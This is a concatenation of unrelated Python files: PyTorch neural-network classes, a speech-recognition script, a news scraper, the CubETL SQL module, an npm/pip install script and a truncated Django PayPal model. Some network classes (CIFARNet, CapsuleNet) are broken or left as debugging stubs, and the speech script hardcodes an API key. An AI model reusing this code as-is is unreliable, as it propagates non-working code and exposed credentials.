sigmoid_mins = - np.ones(out_mins.shape)
sigmoid_maxs = np.ones(out_maxs.shape)
trsf_in = {'view_dim': (-1, *self.out_dim), 'in_maxs': sigmoid_maxs, 'in_mins': sigmoid_mins, 'out_maxs': out_maxs, 'out_mins': out_mins}
self.out_activation = partial(apply_sigmoid_and_transform, **trsf_in)
elif type(action_space) is gym.spaces.Discrete:
# Discrete action space:
# Probabilistic output to be indexed by maximum probability.
# Output is the index of the most likely action.
self.n_out = action_space.n
self.out_activation = nn.LogSoftmax(dim=1)
elif type(action_space) is gym.spaces.MultiDiscrete:
IPython.embed()
pass
elif type(action_space) is gym.spaces.MultiBinary:
IPython.embed()
pass
elif type(action_space) is gym.spaces.tuple:
# Tuple of different action spaces
# https://github.com/openai/gym/blob/master/gym/envs/algorithmic/algorithmic_env.py
IPython.embed()
pass
assert hasattr(observation_space, 'shape') and len(observation_space.shape) == 1
assert hasattr(action_space, 'shape')
self.in_dim = observation_space.shape
self.n_in = int(np.prod(observation_space.shape))
self.lin1 = nn.Linear(self.n_in, 512)
self.relu1 = nn.ReLU()
self.lin2 = nn.Linear(512, 1024)
self.relu2 = nn.ReLU()
self.lin3 = nn.Linear(1024, 1024)
self.relu3 = nn.ReLU()
self.lin4 = nn.Linear(1024, 512)
self.relu4 = nn.ReLU()
self.lin5 = nn.Linear(512, 256)
self.relu5 = nn.ReLU()
self.lin6 = nn.Linear(256, 128)
self.relu6 = nn.ReLU()
self.lin7 = nn.Linear(128, self.n_out)
self._initialize_weights()
def forward(self, x):
x = self.relu1(self.lin1(x))
x = self.relu2(self.lin2(x))
x = self.relu3(self.lin3(x))
x = self.relu4(self.lin4(x))
x = self.relu5(self.lin5(x))
x = self.relu6(self.lin6(x))
x = self.out_activation(self.lin7(x))
return x
class DQN(AbstractESModel):
"""The CNN used by Mnih et al (2015) in "Human-level control through deep reinforcement learning" for Atari environments
"""
def __init__(self, observation_space, action_space):
super(DQN, self).__init__()
assert hasattr(observation_space, 'shape') and len(observation_space.shape) == 3
assert hasattr(action_space, 'n')
self.in_dim = observation_space.shape
in_channels = observation_space.shape[0]
out_dim = action_space.n
self.conv1 = nn.Conv2d(in_channels, out_channels=32, kernel_size=(8, 8), stride=(4, 4))
self.conv1_relu = nn.ReLU()
self.conv2 = nn.Conv2d(32, out_channels=64, kernel_size=(4, 4), stride=(2, 2))
self.conv2_relu = nn.ReLU()
self.conv3 = nn.Conv2d(64, out_channels=64, kernel_size=(3, 3), stride=(1, 1))
self.conv3_relu = nn.ReLU()
n_size = self._get_conv_output(observation_space.shape)
self.lin1 = nn.Linear(n_size, 512)
self.lin1_relu = nn.ReLU()
self.lin2 = nn.Linear(512, out_dim)
self.lin2_logsoftmax = nn.LogSoftmax(dim=1)
self._initialize_weights()
def forward(self, x):
x = self._forward_features(x)
x = x.view(x.size(0), -1)
x = self.lin1_relu(self.lin1(x))
x = self.lin2_logsoftmax(self.lin2(x))
return x
def _get_conv_output(self, shape):
"""Compute the number of output parameters from convolutional part by forward pass
"""
bs = 1
inputs = Variable(torch.rand(bs, *shape))
output_feat = self._forward_features(inputs)
n_size = output_feat.data.view(bs, -1).size(1)
return n_size
def _forward_features(self, x):
x = self.conv1_relu(self.conv1(x))
x = self.conv2_relu(self.conv2(x))
x = self.conv3_relu(self.conv3(x))
return x
class MNISTNet(AbstractESModel):
"""
Convolutional neural network for use on the MNIST data set.
It uses batch normalization to normalize layer outputs before
applying pooling and nonlinearity according to Ioffe (2015) [https://arxiv.org/pdf/1502.03167.pdf]
"""
def __init__(self):
super(MNISTNet, self).__init__()
self.in_dim = torch.Size((1, 28, 28))
self.conv1 = nn.Conv2d(1, 10, kernel_size=(5, 5))
self.conv1_bn = nn.BatchNorm2d(10)
self.conv1_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)
self.conv1_relu = nn.ReLU()
self.conv2 = nn.Conv2d(10, 20, kernel_size=(5, 5))
self.conv2_bn = nn.BatchNorm2d(20)
self.conv2_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)
self.conv2_relu = nn.ReLU()
self.fc1 = nn.Linear(320, 50)
self.fc1_bn = nn.BatchNorm1d(50)
self.fc1_relu = nn.ReLU()
self.fc2 = nn.Linear(50, 10)
self.fc2_logsoftmax = nn.LogSoftmax(dim=1)
self._initialize_weights()
def forward(self, x):
x = self.conv1_relu(self.conv1_pool(self.conv1_bn(self.conv1(x))))
x = self.conv2_relu(self.conv2_pool(self.conv2_bn(self.conv2(x))))
x = x.view(-1, 320)
x = self.fc1_relu(self.fc1_bn(self.fc1(x)))
x = self.fc2_logsoftmax(self.fc2(x))
return x
class MNISTNetDropout(AbstractESModel):
"""
Convolutional neural network for use on the MNIST data set.
It uses batch normalization to normalize layer outputs before
applying pooling and nonlinearity according to Ioffe (2015) [https://arxiv.org/pdf/1502.03167.pdf]
"""
def __init__(self):
super(MNISTNetDropout, self).__init__()
self.in_dim = torch.Size((1, 28, 28))
self.conv1 = nn.Conv2d(1, 10, kernel_size=(5, 5))
self.conv1_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)
self.conv1_relu = nn.ReLU()
self.conv2 = nn.Conv2d(10, 20, kernel_size=(5, 5))
self.conv2_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)
self.conv2_relu = nn.ReLU()
self.conv2_dropout = nn.Dropout2d(p=0.2)
self.fc1 = nn.Linear(320, 50)
self.fc1_relu = nn.ReLU()
self.fc1_dropout = nn.Dropout(p=0.5)
self.fc2 = nn.Linear(50, 10)
self.fc2_logsoftmax = nn.LogSoftmax(dim=1)
self._initialize_weights()
def forward(self, x):
x = self.conv1_relu(self.conv1_pool(self.conv1(x)))
x = self.conv2_dropout(self.conv2_relu(self.conv2_pool(self.conv2(x))))
x = x.view(-1, 320)
x = self.fc1_dropout(self.fc1_relu(self.fc1(x)))
x = self.fc2_logsoftmax(self.fc2(x))
return x
class MNISTNetNoBN(AbstractESModel):
"""This version uses no batch normalization
"""
def __init__(self):
super(MNISTNetNoBN, self).__init__()
self.in_dim = torch.Size((1, 28, 28))
self.conv1 = nn.Conv2d(1, 10, kernel_size=(5, 5))
self.conv1_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)
self.conv1_relu = nn.ReLU()
self.conv2 = nn.Conv2d(10, 20, kernel_size=(5, 5))
self.conv2_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)
self.conv2_relu = nn.ReLU()
self.fc1 = nn.Linear(320, 50)
self.fc1_relu = nn.ReLU()
self.fc2 = nn.Linear(50, 10)
self.fc2_logsoftmax = nn.LogSoftmax(dim=1)
self._initialize_weights()
def forward(self, x):
x = self.conv1_relu(self.conv1_pool(self.conv1(x)))
x = self.conv2_relu(self.conv2_pool(self.conv2(x)))
x = x.view(-1, 320)
x = self.fc1_relu(self.fc1(x))
x = self.fc2_logsoftmax(self.fc2(x))
return x
class MNISTNetNoInit(MNISTNet):
"""This version uses default weight initialization
"""
def __init__(self):
super(MNISTNetNoInit, self).__init__()
self.in_dim = torch.Size((1, 28, 28))
self.conv1 = nn.Conv2d(1, 10, kernel_size=(5, 5))
self.conv1_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)
self.conv1_relu = nn.ReLU()
self.conv2 = nn.Conv2d(10, 20, kernel_size=(5, 5))
self.conv2_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)
self.conv2_relu = nn.ReLU()
self.fc1 = nn.Linear(320, 50)
self.fc1_relu = nn.ReLU()
self.fc2 = nn.Linear(50, 10)
self.fc2_logsoftmax = nn.LogSoftmax(dim=1)
class CIFARNet(nn.Module):
"""A CNN for the CIFARn data set where n is variable.
http://www.isip.uni-luebeck.de/fileadmin/uploads/tx_wapublications/hertel_ijcnn_2015.pdf
No. Layer Dimension Kernel Stride Padding
Width Height Depth
0 Input 227 227 3 - - -
1 Convolution 55 55 96 11 4 -
2 Relu 55 55 96 - - -
3 Pooling 27 27 96 3 2 -
4 Normalization 27 27 96 - - -
5 Convolution 27 27 256 5 1 2
6 Relu 27 27 256 - - -
7 Pooling 13 13 256 3 2 -
8 Normalization 13 13 256 - - -
9 Convolution 13 13 384 3 1 1
10 Relu 13 13 384 - - -
11 Convolution 13 13 384 3 1 1
12 Relu 13 13 384 - - -
13 Convolution 13 13 256 3 1 1
14 Relu 13 13 256 - - -
15 Pooling 6 6 256 3 2 -
16 Fully Connected 1 1 4096 - - -
17 Relu 1 1 4096 - - -
18 Dropout 1 1 4096 - - -
19 Fully Connected 1 1 4096 - - -
20 Relu 1 1 4096 - - -
21 Dropout 1 1 4096 - - -
22 Fully Connected 1 1 1000 - - -
23 Softmax 1 1 1000 - - -
"""
def __init__(self, n=10):
super(CIFARNet, self).__init__()
IPython.embed()
self.in_dim = torch.Size((1, 28, 28))
self.conv1 = nn.Conv2d(3, 96, (11, 11), stride=4)
self.conv1_bn = nn.BatchNorm2d(96)
self.conv1_pool = nn.MaxPool2d((3,3), stride=2)
self.conv1_relu = nn.ReLU()
self.conv2 = nn.Conv2d(27, 256, (5, 5), stride=4)
self.conv1_bn = nn.BatchNorm2d(256)
self.conv2_pool = nn.MaxPool2d((3,3), stride=2)
self.conv2_relu = nn.ReLU()
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
self._initialize_weights()
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class CapsuleLayer(nn.Module):
def __init__(self, num_capsules, num_route_nodes, in_channels, out_channels, kernel_size=None, stride=None,
num_iterations=3):
super(CapsuleLayer, self).__init__()
self.num_route_nodes = num_route_nodes
self.num_iterations = num_iterations
self.num_capsules = num_capsules
if num_route_nodes != -1:
self.route_weights = nn.Parameter(torch.randn(num_capsules, num_route_nodes, in_channels, out_channels))
else:
self.capsules = nn.ModuleList(
[nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, stride=stride, padding=0) for _ in
range(num_capsules)])
def squash(self, tensor, dim=-1):
squared_norm = (tensor ** 2).sum(dim=dim, keepdim=True)
scale = squared_norm / (1 + squared_norm)
return scale * tensor / torch.sqrt(squared_norm)
def forward(self, x):
if self.num_route_nodes != -1:
priors = x[None, :, :, None, :] @ self.route_weights[:, None, :, :, :]
logits = Variable(torch.zeros(*priors.size())).cuda()
for i in range(self.num_iterations):
probs = capsule_softmax(logits, dim=2)
outputs = self.squash((probs * priors).sum(dim=2, keepdim=True))
if i != self.num_iterations - 1:
delta_logits = (priors * outputs).sum(dim=-1, keepdim=True)
logits = logits + delta_logits
else:
outputs = [capsule(x).view(x.size(0), -1, 1) for capsule in self.capsules]
outputs = torch.cat(outputs, dim=-1)
outputs = self.squash(outputs)
return outputs
class CapsuleNet(nn.Module):
def __init__(self, n_classes):
super(CapsuleNet, self).__init__()
self.conv1 = nn.Conv2d(in_channels=1, out_channels=256, kernel_size=9, stride=1)
self.primary_capsules = CapsuleLayer(num_capsules=8, num_route_nodes=-1, in_channels=256, out_channels=32,
kernel_size=9, stride=2)
self.digit_capsules = CapsuleLayer(num_capsules=n_classes, num_route_nodes=32 * 6 * 6, in_channels=8,
out_channels=16)
self.decoder = nn.Sequential(
nn.Linear(16 * n_classes, 512),
nn.ReLU(inplace=True),
nn.Linear(512, 1024),
nn.ReLU(inplace=True),
nn.Linear(1024, 784),
nn.Sigmoid()
)
def forward(self, x, y=None):
x = F.relu(self.conv1(x), inplace=True)
x = self.primary_capsules(x)
x = self.digit_capsules(x).squeeze().transpose(0, 1)
classes = (x ** 2).sum(dim=-1) ** 0.5
classes = F.softmax(classes)
if y is None:
# In all batches, get the most active capsule.
_, max_length_indices = classes.max(dim=1)
y = Variable(torch.sparse.torch.eye(n_classes)).cuda().index_select(dim=0, index=max_length_indices.data)
reconstructions = self.decoder((x * y[:, :, None]).view(x.size(0), -1))
return classes, reconstructions
class CapsuleLoss(nn.Module):
def __init__(self):
super(CapsuleLoss, self).__init__()
self.reconstruction_loss = nn.MSELoss(size_average=False)
def forward(self, images, labels, classes, reconstructions):
left = F.relu(0.9 - classes, inplace=True) ** 2
right = F.relu(classes - 0.1, inplace=True) ** 2
margin_loss = labels * left + 0.5 * (1. - labels) * right
margin_loss = margin_loss.sum()
reconstruction_loss = self.reconstruction_loss(reconstructions, images)
return (margin_loss + 0.0005 * reconstruction_loss) / images.size(0)
|
import speech_recognition as sr
# obtain path to "english.wav" in the same folder as this script
from os import path
AUDIO_FILE = path.join(path.dirname(path.realpath(__file__)), "testAudio/test.wav")
# use the audio file as the audio source
r = sr.Recognizer()
with sr.AudioFile(AUDIO_FILE) as source:
audio = r.record(source)
try:
print(r.recognize_google(audio, language="fr-fr", key="31a5e855f751a62fd6b36ab22ff8df379f867379"))
except sr.UnknownValueError:
print("Google Speech Recognition could not understand audio")
except sr.RequestError as e:
print("Could not request results from Google Speech Recognition service; {0}".format(e)) |
import requests
from bs4 import BeautifulSoup
def getText(url):
"""
takes the url (string) and returns the contents as text
FIXME
"""
r1 = requests.get(url)
page = r1.content
soup1 = BeautifulSoup(page, "html.parser")
soup1.prettify()
page_news = soup1.find('article', class_= "pg-rail-tall pg-rail--align-right").div.div.div
page_news.get_text()
return page_news
def study_to_string(study):
"""
returns a string representing the contents of study
"""
ret = "Title: " + study[0]
if (study[1] is not None) and (study[1] != ""):
ret += "\n" + "Summary: " + study[1]
if (study[2] is not None) and (study[2] != ""):
ret += "\n" + "Journal: " + study[2]
if (study[3] is not None) and (study[3] != ""):
ret += "\n" + "URL: " + study[3]
return ret
def main(url, nresults = 3):
"""
url is a url to an article
nresults defaults to 3, and is the number of strings returned
the code returns nresults number of strings in an array
"""
res = getText(url)
if res is None:
return [""] * nresults
# assuming getText function works for now... @FIXME
from main import best_studies
ret = []
studies = best_studies(str(res), nresults)
for study in studies:
if study is None:
break
sts = study_to_string(study)
ret.append(sts)
return ret
if __name__ == '__main__':
result = main("https://www.cnn.com/2020/05/02/us/isabella-geriatric-center-coronavirus-nyc/index.html")
"""
For future readers: main is documented
""" |
# CubETL
# Copyright (c) 2013-2019 Jose Juan Montes
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import sys
from cubetl.core import Node, Component
from cubetl.core.exceptions import ETLConfigurationException
from cubetl.text.functions import parsebool
from sqlalchemy.engine import create_engine
from sqlalchemy.exc import ResourceClosedError
from sqlalchemy.schema import Table, MetaData, Column, ForeignKey
from sqlalchemy.sql.expression import and_
from sqlalchemy.types import Integer, String, Float, Boolean, Unicode, Date, Time, DateTime, Binary
# Get an instance of a logger
logger = logging.getLogger(__name__)
class Connection(Component):
def __init__(self, url, connect_args=None):
super().__init__()
self.url = url
self.connect_args = connect_args or {} # {'sslmode':'require'}
self._engine = None
#def __repr__(self):
# return "%s(url='%s')" % (self.__class__.__name__, self._url)
def lazy_init(self):
if self._engine is None:
url = self.url
logger.info("Connecting to database: %s (%s)", url, self.connect_args)
self._engine = create_engine(url, connect_args=self.connect_args)
self._connection = self._engine.connect()
def connection(self):
self.lazy_init()
return self._connection
def engine(self):
self.lazy_init()
return self._engine
class SQLColumn(Component):
TYPE_INTEGER = "INTEGER"
TYPE_STRING = "TEXT"
def __init__(self, name, type, pk=False, nullable=True, label=None):
super(SQLColumn, self).__init__()
self.sqltable = None
self.name = name
self.type = type
self.pk = pk
self.label = label or name
self.nullable = nullable
def __str__(self):
return "%s(name=%s)" % (self.__class__.__name__, self.name)
class SQLColumnFK(SQLColumn):
def __init__(self, name, type, pk, fk_sqlcolumn, null=True, label=None):
super(SQLColumnFK, self).__init__(name, type, pk, null, label=label)
self.fk_sqlcolumn = fk_sqlcolumn
class SQLTable(Component):
_selects = 0
_inserts = 0
_updates = 0
_finalized = False
STORE_MODE_LOOKUP = "lookup"
STORE_MODE_INSERT = "insert"
STORE_MODE_UPSERT = "upsert"
_pk = False
columns = []
create = True
_unicode_errors = 0
_lookup_changed_fields = None
def __init__(self, name, connection, columns, label=None):
super(SQLTable, self).__init__()
self.sa_table = None
self.sa_metadata = None
self.name = name
self.connection = connection
self.label = label if label else name
self.columns = columns or []
for col in columns:
col.sqltable = self
def _get_sa_type(self, column):
if (column.type == "Integer"):
return Integer
elif (column.type == "String"):
#if (column.length is None): column.length = 128
return Unicode(length = 128)
elif (column.type == "Float"):
return Float
elif (column.type == "Boolean"):
return Boolean
elif (column.type == "AutoIncrement"):
return Integer
elif (column.type == "Date"):
return Date
elif (column.type == "Time"):
return Time
elif (column.type == "DateTime"):
return DateTime
elif (column.type == "Binary"):
return Binary
else:
raise Exception("Invalid data type (%s): %s" % (column, column.type))
def finalize(self, ctx):
if (not SQLTable._finalized):
SQLTable._finalized = True
if (SQLTable._inserts + SQLTable._selects > 0):
logger.info("SQLTable Totals ins/upd/sel: %d/%d/%d " %
(SQLTable._inserts, SQLTable._updates, SQLTable._selects))
if (self._inserts + self._selects > 0):
logger.info("SQLTable %-18s ins/upd/sel: %6d/%6d/%-6d " %
(self.name, self._inserts, self._updates, self._selects))
if (self._unicode_errors > 0):
logger.warning("SQLTable %s found %d warnings assigning non-unicode fields to unicode columns" %
(self.name, self._unicode_errors))
ctx.comp.finalize(self.connection)
super(SQLTable, self).finalize(ctx)
def initialize(self, ctx):
super(SQLTable, self).initialize(ctx)
if self._lookup_changed_fields == None:
self._lookup_changed_fields = []
ctx.comp.initialize(self.connection)
logger.debug("Loading table %s on %s" % (self.name, self))
self.sa_metadata = MetaData()
self.sa_table = Table(self.name, self.sa_metadata)
self._selects = 0
self._inserts = 0
self._updates = 0
self._unicode_errors = 0
# Drop?
columns_ex = []
for column in self.columns:
logger.debug("Adding column to %s: %s" % (self, column))
column.sqltable = self
# Check for duplicate names
if (column.name in columns_ex):
raise ETLConfigurationException("Duplicate column name '%s' in %s" % (column.name, self))
columns_ex.append(column.name)
# Configure column
if isinstance(column, SQLColumnFK):
if column.fk_sqlcolumn.sqltable.sa_table is None:
logger.warning("Column %s foreign key %s table (%s) has not been defined in backend (ignoring).", column, column.fk_sqlcolumn, column.fk_sqlcolumn.sqltable)
continue
self.sa_table.append_column(Column(column.name,
self._get_sa_type(column),
ForeignKey(column.fk_sqlcolumn.sqltable.sa_table.columns[column.fk_sqlcolumn.name]),
primary_key=column.pk,
nullable=column.nullable,
autoincrement=(True if column.type == "AutoIncrement" else False)))
else:
self.sa_table.append_column(Column(column.name,
self._get_sa_type(column),
primary_key=column.pk,
nullable=column.nullable,
autoincrement=(True if column.type == "AutoIncrement" else False)))
# Check schema:
# Create if doesn't exist
if (not self.connection.engine().has_table(self.name)):
logger.info("Creating table %s" % self.name)
self.sa_table.create(self.connection.connection())
# TODO:? Extend? (unsafe, allow read-only connections and make them default?)
# TODO:? Delete columns (unsafe, allow read-only connections and make them default?)
def pk(self, ctx):
"""
Returns the primary key column definitToClauion, or None if none defined.
"""
#if (self._pk == False):
if True:
pk_cols = []
for col in self.columns:
if col.pk:
pk_cols.append(col)
if (len(pk_cols) > 1):
raise Exception("Table %s has multiple primary keys: %s" % (self.name, pk_cols))
elif (len(pk_cols) == 1):
self._pk = pk_cols[0]
else:
self._pk = None
return self._pk
def _attribsToClause(self, attribs):
clauses = []
for k, v in attribs.items():
if isinstance(v, (list, tuple)):
clauses.append(self.sa_table.c[k].in_(v))
else:
clauses.append(self.sa_table.c[k] == v)
return and_(*clauses)
def _rowtodict(self, row):
d = {}
for column in self.columns:
#print column
d[column.name] = getattr(row, column.name)
return d
def _find(self, ctx, attribs):
self._selects = self._selects + 1
SQLTable._selects = SQLTable._selects + 1
query = self.sa_table.select(self._attribsToClause(attribs))
rows = self.connection.connection().execute(query)
for r in rows:
# Ensure we return dicts, not RowProxys from SqlAlchemy
yield self._rowtodict(r)
def lookup(self, ctx, attribs, find_function=None):
logger.debug ("Lookup on '%s' attribs: %s" % (self, attribs))
if (len(attribs.keys()) == 0):
raise Exception("Cannot lookup on table '%s' with no criteria (empty attribute set)" % self.name)
find_function = find_function or self._find
rows = find_function(ctx, attribs)
rows = list(rows)
if (len(rows) > 1):
raise Exception("Found more than one row when searching for just one in table %s: %s" % (self.name, attribs))
elif (len(rows) == 1):
row = rows[0]
else:
row = None
logger.debug("Lookup result on %s: %s = %s" % (self.name, attribs, row))
return row
def upsert(self, ctx, data, keys = []):
"""
Upsert checks if the row exists and has changed. It does a lookup
followed by an update or insert as appropriate.
"""
# TODO: Check for AutoIncrement in keys, shall not be used
# If keys
qfilter = {}
if (len(keys) > 0):
for key in keys:
try:
qfilter[key] = data[key]
except KeyError as e:
raise Exception("Could not find attribute '%s' in data when storing row data: %s" % (key, data))
else:
pk = self.pk(ctx)
qfilter[pk.name] = data[pk.name]
# Do lookup
if len(qfilter) > 0:
row = self.lookup(ctx, qfilter)
if (row):
# Check row is identical
for c in self.columns:
if c.type != "AutoIncrement":
v1 = row[c.name]
v2 = data[c.name]
if c.type == "Date":
v1 = row[c.name].strftime('%Y-%m-%d')
v2 = data[c.name].strftime('%Y-%m-%d')
if (isinstance(v1, str) or isinstance(v2, str)):
if (not isinstance(v1, str)): v1 = str(v1)
if (not isinstance(v2, str)): v2 = str(v2)
if (v1 != v2):
if (c.name not in self._lookup_changed_fields):
logger.warning("%s updating an entity that exists with different attributes, overwriting (field=%s, existing_value=%s, tried_value=%s)" % (self, c.name, v1, v2))
#self._lookup_changed_fields.append(c["name"])
# Update the row
row = self.update(ctx, data, keys)
return row
row_with_id = self.insert(ctx, data)
return row_with_id
def _prepare_row(self, ctx, data):
row = {}
for column in self.columns:
if column.type != "AutoIncrement":
try:
row[column.name] = data[column.name]
except KeyError as e:
raise Exception("Missing attribute for column %s in table '%s' while inserting row: %s" % (e, self.name, data))
# Checks
if (column.type == "String") and (not isinstance(row[column.name], str)):
self._unicode_errors = self._unicode_errors + 1
if (ctx.debug):
logger.warning("Unicode column %r received non-unicode string: %r " % (column.name, row[column.name]))
return row
def insert(self, ctx, data):
row = self._prepare_row(ctx, data)
logger.debug("Inserting in table '%s' row: %s" % (self.name, row))
res = self.connection.connection().execute(self.sa_table.insert(row))
pk = self.pk(ctx)
if pk:
row[pk.name] = res.inserted_primary_key[0]
self._inserts = self._inserts + 1
SQLTable._inserts = SQLTable._inserts + 1
if pk is not None:
return row
else:
return row # None
def update(self, ctx, data, keys = []):
row = self._prepare_row(ctx, data)
# Automatically calculate lookup if necessary
qfilter = {}
if (len(keys) > 0):
for key in keys:
try:
qfilter[key] = data[key]
except KeyError as e:
raise Exception("Could not find attribute '%s' in data when storing row data: %s" % (key, data))
else:
pk = self.pk(ctx)
qfilter[pk.name] = data[pk.name]
logger.debug("Updating in table '%s' row: %s" % (self.name, row))
res = self.connection.connection().execute(self.sa_table.update(self._attribsToClause(qfilter), row))
self._updates = self._updates +1
SQLTable._updates = SQLTable._updates + 1
if pk is not None:
return row
else:
return None
class Transaction(Node):
def __init__(self, connection, enabled=True):
super().__init__()
self.connection = connection
self.enabled = enabled
self._transaction = None
def initialize(self, ctx):
super(Transaction, self).initialize(ctx)
ctx.comp.initialize(self.connection)
self.enabled = parsebool(self.enabled)
def finalize(self, ctx):
ctx.comp.finalize(self.connection)
#super(Transaction, self).finalize(ctx)
def process(self, ctx, m):
# Store
if (self._transaction != None):
raise Exception("Trying to start transaction while one already exists is not supported")
if (self.enabled):
logger.info("Starting database transaction")
self._transaction = self.connection.connection().begin()
else:
logger.debug("Not starting database transaction (Transaction node is disabled)")
yield m
if (self.enabled):
logger.info("Commiting database transaction")
self._transaction.commit()
self._transaction = None
class StoreRow(Node):
def __init__(self, sqltable, store_mode=SQLTable.STORE_MODE_INSERT):
super(StoreRow, self).__init__()
self.sqltable = sqltable
self.store_mode = store_mode
# TODO: mappings are needed (here, not in the schema ¿? :)), standarize (Key/ValueMapping? NameMapping? ColumnMapping? AttributeMapping?)
def initialize(self, ctx):
super(StoreRow, self).initialize(ctx)
ctx.comp.initialize(self.sqltable)
def finalize(self, ctx):
ctx.comp.finalize(self.sqltable)
super(StoreRow, self).finalize(ctx)
def process(self, ctx, m):
# Store
if self.store_mode == SQLTable.STORE_MODE_UPSERT:
self.sqltable.upsert(ctx, m)
elif self.store_mode == SQLTable.STORE_MODE_INSERT:
self.sqltable.insert(ctx, m)
yield m
class QueryLookup(Node):
connection = None
query = None
def initialize(self, ctx):
super(QueryLookup, self).initialize(ctx)
ctx.comp.initialize(self.connection)
def finalize(self, ctx):
ctx.comp.finalize(self.connection)
super(QueryLookup, self).finalize(ctx)
def _rowtodict(self, row):
d = {}
for column,value in row.items():
d[column] = value
return d
def _do_query(self, query):
logger.debug ("Running query: %s" % query.strip())
rows = self.connection.connection().execute(query)
result = None
for r in rows:
if (result != None):
raise Exception ("Error: %s query resulted in more than one row: %s" % (self, self.query) )
result = self._rowtodict(r)
# TODO: Optional fail?
if (not result):
raise Exception ("Error: %s query returned no results: %s" % (self, self.query) )
return result
def process(self, ctx, m):
query = ctx.interpolate(self.query, m)
result = self._do_query(query)
if (result != None):
m.update(result)
yield m
class Query(Node):
"""
Executes a SQL query on the given connection and returns the results.
By default, each row is returned as a new message, generated by copying
the input message and updating its fields with the columns that resulted
from the SQL query.
:param connection: The SQLConnection object to use.
:param query: The SQL query string to execute.
:param embed: If defined, the entire results of the query are returned
as an array contained in the message attribute named like
the value of the `embed` parameter (m[embed]=query_result_array).
:param single: If True, the process will fail if the query returns more than one row.
:param failifempty: if True, the process will fail if the query returns no row.
"""
def __init__(self, connection, query, embed=False, single=False, failifempty=True):
super().__init__()
self.connection = connection
self.query = query
self.embed = embed
self.single = single
self.failifempty = failifempty
def initialize(self, ctx):
super(Query, self).initialize(ctx)
ctx.comp.initialize(self.connection)
def finalize(self, ctx):
ctx.comp.finalize(self.connection)
super(Query, self).finalize(ctx)
def _rowtodict(self, row):
d = {}
for column, value in row.items():
d[column] = value
return d
def process(self, ctx, m):
query = ctx.interpolate(self.query, m)
logger.debug("Running query: %s" % query.strip())
rows = self.connection.connection().execute(query)
try:
if self.embed:
result = []
for r in rows:
result.append(self._rowtodict(r))
if self.single and len(result) > 1:
raise Exception("Error: %s query resulted in more than one row: %s" % (self, query))
if len(result) == 0:
if self.failifempty:
raise Exception("Error: %s query returned no results: %s" % (self, query))
else:
result = None
m[self.embed] = result[0] if self.single else result
yield m
else:
result = None
for r in rows:
if self.single and result != None:
raise Exception("Error: %s query resulted in more than one row: %s" % (self, query))
m2 = ctx.copy_message(m)
result = self._rowtodict(r)
if result is not None:
m2.update(result)
yield m2
if not result:
if self.failifempty:
raise Exception("Error: %s query returned no results: %s" % (self, query))
else:
yield m
except ResourceClosedError as e:
yield m
|
"""
An script to configure install all the runtime dependencies required of the
Let's Sched It application-space.
@author: Elias Gabriel
@revision: v1.0
"""
import subprocess
def cmd(command, capture=False):
""" Executes the given command as a subprocess with the given arguments. """
return subprocess.run(command, shell=True, check=False, capture_output=capture)
def header(message):
print("\n\33[95m ===== " + message + "...\33[0m")
if __name__ == "__main__":
# Confirm that Node.js is installed
if cmd("node -v && npm -v", True).returncode != 0:
print("\n\33[91m *** \33[4mInstallation error!\33[0m\33[91m ***")
print("Node.js and npm are required by the frontend architecture.\nPlease install Node.js and npm using your package manager\n or manually by source, then retry installation.\n")
exit(1)
# Confirm that MySQL (MariaDB) is installed
if cmd("mysql --print-defaults", True).returncode != 0:
print("\n\33[91m *** \33[4mInstallation error!\33[0m\33[91m ***")
print("MySQL is required by the backend architecture.\nPlease install MySQL, preferably MariaDB, using \n your package manager, then retry installation.\nDetailed instructions can be found on the official README.\n")
exit(1)
# Download Node dependencies
header("Installing node dependencies")
cmd("cd ./source/web && npm install")
# Download Python dependencies
header("Installing pre-built Python dependencies")
cmd("pip install -r ./source/api/requirements.txt")
# Configure MySQL database
header("Configuring the MySQL database")
cmd("cd ./source/api && python .pyinitdb")
print("\n*** \33[92mDependency installation complete!\33[0m ***")
|
from django.db import models
from .base import PaypalModel
from ..constants import (
ORDER_INTENT_CHOICES, ORDER_STATUS_CHOICES,
CAPTURE_STATUS_CHOICES, DISBURSEMENT_MODE_CHOICES,
)
from ..fields import JSONField, CurrencyAmountField
class CheckoutOrder(PaypalModel):
'''
https://developer.paypal.com/docs/api/orders/v2/#orders
